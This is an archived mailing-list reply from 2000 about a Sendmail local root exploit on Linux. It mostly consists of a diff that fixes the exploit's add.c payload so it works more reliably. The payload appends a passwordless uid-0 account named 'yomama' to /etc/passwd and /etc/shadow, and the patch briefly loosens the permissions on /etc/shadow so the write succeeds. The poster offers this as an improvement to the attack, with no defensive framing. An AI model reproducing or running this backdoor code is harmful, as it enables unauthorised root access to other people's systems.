OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Sendmail local root exploit on linux 2.2.x
From: Mark K. Pettit (pettitYAHOO-INC.COM)
Date: Thu Jun 08 2000 - 14:18:44 CDT

>Hello all,
>
>Attached is a file with 2 sources, ex.c and add.c

This is a great exploit. It is a little broken, though. Here's a
patched version of the add.c script so that it is a little kinder and
works out of the box the first time.

The problem has to do with the permissions on the shadow file. If it's
installed with mode 400, the exploit will fail. There's also a \n left
out of the shadow line.

This patch fixes both of these problems. Yah, I know it's trivial, but
I wanted to be complete.

============================================================================
--- add.c.orig Thu Jun 8 11:32:33 2000
+++ add.c Thu Jun 8 11:21:15 2000
-1,17 +1,24
 #include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>

 int main (void) {
    int fd;
    char string[40];
+ struct stat buf;

    seteuid(0);
    fd = open("/etc/passwd", O_APPEND|O_WRONLY);
    strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
    write(fd, string, strlen(string));
    close(fd);
+ stat("/etc/shadow", &buf);
+ chmod("/etc/shadow", S_IRUSR|S_IWUSR);
    fd = open("/etc/shadow", O_APPEND|O_WRONLY);
- strcpy(string, "yomama::11029:0:99999:7:::");
+ strcpy(string, "yomama::11029:0:99999:7:::\n");
    write(fd, string, strlen(string));
    close(fd);
-
+ chmod("/etc/shadow", buf.st_mode);
 }
============================================================================ 

--
Mark K. Pettit, CCNA                Do you, uh, Yahoo!?
pettityahoo-inc.com             Why, yes, I do, uh, Yahoo!
Technical Yahoo
Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051